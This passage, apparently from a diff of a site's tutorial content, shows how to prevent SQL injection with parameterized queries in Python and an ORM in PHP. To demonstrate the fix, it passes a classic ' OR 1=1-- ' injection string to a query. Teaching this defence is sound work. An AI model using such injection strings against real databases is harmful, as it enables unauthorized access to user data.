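    # compared as a plain string and never parsed as SQL.
    return conn.execute(
        'SELECT username FROM users WHERE username = ?', (username,)
    ).fetchall()


print(find_user('kchung'))                # [('kchung',)]
print(find_user(QUOTE + ' OR 1=1-- '))    # []
```

The injection payload now matches nothing, because the database looks for a user whose name is literally that string.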
Another way to prevent SQL Injection is to use an ORM (Object Relational Mapping) library. ORM libraries abstract the database layer and allow you to interact with the database using objects instead of raw SQL queries.
<?php\n $user = User::where('username', $username)->first();\n?>\n
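ORM libraries typically build parameterized queries or escape user input for you, which prevents SQL Injection as long as you avoid passing user input to their raw-query features.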
"}]} \ No newline at end of file diff --git a/sitemap.xml.gz b/sitemap.xml.gz index 4295c488..7de6d6ba 100644 Binary files a/sitemap.xml.gz and b/sitemap.xml.gz differ